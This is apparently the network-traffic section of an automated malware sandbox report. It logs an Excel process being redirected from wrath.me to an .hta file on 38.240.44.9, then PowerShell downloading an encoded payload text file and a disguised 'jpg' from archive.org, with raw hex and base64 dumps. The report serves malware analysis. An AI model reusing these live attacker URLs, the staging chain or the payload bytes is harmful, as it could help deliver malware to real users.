                                                                                                                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.224917738.240.44.9804040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:49.924349070 CEST75OUTGET /590/RRSRRD.txt HTTP/1.1
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766021967 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:53 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:17:16 GMT
                                                                                                                                                                                              ETag: "a1000-623f2c3f33b7c"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Length: 659456
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766047001 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766057014 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766366005 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                                              Oct 8, 2024 15:37:50.766377926 CEST896INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                                              Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966109991 CEST1236INData Raw: 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57 44
                                                                                                                                                                                              Data Ascii: YDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFDT
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966125965 CEST1236INData Raw: 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d 6d
                                                                                                                                                                                              Data Ascii: AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wAN
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966139078 CEST1236INData Raw: 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43 54
                                                                                                                                                                                              Data Ascii: SDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzjw
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966159105 CEST1236INData Raw: 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51 70
                                                                                                                                                                                              Data Ascii: 4YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkN
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966170073 CEST896INData Raw: 79 44 71 38 51 4b 50 67 79 7a 6d 38 59 46 50 41 73 44 2f 37 67 2f 4f 30 76 7a 37 37 67 2b 4f 78 71 7a 41 35 55 66 4f 58 6e 44 78 33 77 79 4e 6f 63 44 4a 33 41 79 4e 62 59 6a 31 32 41 6f 4e 38 5a 44 65 32 51 6e 4e 76 5a 44 61 32 45 44 4e 44 53 54
                                                                                                                                                                                              Data Ascii: yDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FTe
                                                                                                                                                                                              Oct 8, 2024 15:37:50.966233969 CEST1236INData Raw: 41 41 41 42 67 47 41 44 41 46 41 2f 30 39 50 59 2f 44 30 2f 6f 38 50 42 2f 7a 6d 2f 51 33 50 75 39 54 58 2f 55 31 50 6d 38 54 47 2f 41 78 50 42 34 54 39 2b 6f 74 50 4f 36 54 63 2b 34 6c 50 50 35 6a 52 2b 73 6a 50 75 34 54 4a 39 38 65 50 6f 33 54
                                                                                                                                                                                              Data Ascii: AAABgGADAFA/09PY/D0/o8PB/zm/Q3Pu9TX/U1Pm8TG/AxPB4T9+otPO6Tc+4lPP5jR+sjPu4TJ98ePo3T29IZPK2Tg88OPkzTy8sLPoyDl84IP2xTY8sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt6UQOXmji5UYOklzX5oVOJlzG4sLOSizQ3s+NSfjy3M6NWeDO34yNccjF38gN6bD12MsNzazp2QpNBajM2YQNoWTl1kUNDVjI


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.2249161188.114.96.34433564C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:10 UTC321OUTGET /DeSHzc HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: wrath.me
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:10 UTC1160INHTTP/1.1 302 Found
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:10 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                              Content-Length: 74
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                              cross-origin-resource-policy: same-origin
                                                                                                                                                                                              x-dns-prefetch-control: off
                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                              x-download-options: noopen
                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                                                                                              referrer-policy: no-referrer
                                                                                                                                                                                              x-xss-protection: 0
                                                                                                                                                                                              location: http://38.240.44.9/590/un/verynicepersonupdation.hta
                                                                                                                                                                                              vary: Accept, Accept-Encoding
                                                                                                                                                                                              x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                                              x-do-orig-status: 302
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ve5uWSjpqWFhnLYNMhPDMmIlbWVtmIop8VVtj699kwx6ElodMPJhUMGcQ%2BB%2Flf3JBMnA%2B8gZqybZjDOdBv1mqyU31H8YiU08n6WlELnInMQU0MxvdNUfkpkEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8cf686264e877c9a-EWR
                                                                                                                                                                                              2024-10-08 13:37:10 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 33 38 2e 32 34 30 2e 34 34 2e 39 2f 35 39 30 2f 75 6e 2f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 75 70 64 61 74 69 6f 6e 2e 68 74 61
                                                                                                                                                                                              Data Ascii: Found. Redirecting to http://38.240.44.9/590/un/verynicepersonupdation.hta


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.2249163188.114.97.34433852C:\Windows\System32\mshta.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:12 UTC345OUTGET /DeSHzc HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: wrath.me
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:13 UTC1164INHTTP/1.1 302 Found
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:13 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                              Content-Length: 74
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                              cross-origin-resource-policy: same-origin
                                                                                                                                                                                              x-dns-prefetch-control: off
                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                              x-download-options: noopen
                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                                                                                              referrer-policy: no-referrer
                                                                                                                                                                                              x-xss-protection: 0
                                                                                                                                                                                              location: http://38.240.44.9/590/un/verynicepersonupdation.hta
                                                                                                                                                                                              vary: Accept, Accept-Encoding
                                                                                                                                                                                              x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                                              x-do-orig-status: 302
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVD5B0n9qqWtSTkitC%2Baxy5Bu6mYZq11Ujp0EOnbKWYC%2BPXKs97RC02ZFzBCt5%2FBWWWtyLNmXaU5HXkqDt%2B%2B1Hqt8C5V2U3NkbUVFMBqZ5gTj1rZjaHwBYpBLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8cf686369d160f74-EWR
                                                                                                                                                                                              2024-10-08 13:37:13 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 33 38 2e 32 34 30 2e 34 34 2e 39 2f 35 39 30 2f 75 6e 2f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 75 70 64 61 74 69 6f 6e 2e 68 74 61
                                                                                                                                                                                              Data Ascii: Found. Redirecting to http://38.240.44.9/590/un/verynicepersonupdation.hta


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.2249166207.241.227.2424432476C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:28 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                              Host: ia600102.us.archive.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:28 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:28 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 6331693
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "6704abca-609d2d"
                                                                                                                                                                                              Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                              Expires: Tue, 08 Oct 2024 19:37:28 GMT
                                                                                                                                                                                              Cache-Control: max-age=21600
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-10-08 13:37:28 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                                                                                                                                              Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                                                                                                                                              Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                                                                                                                                                              Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
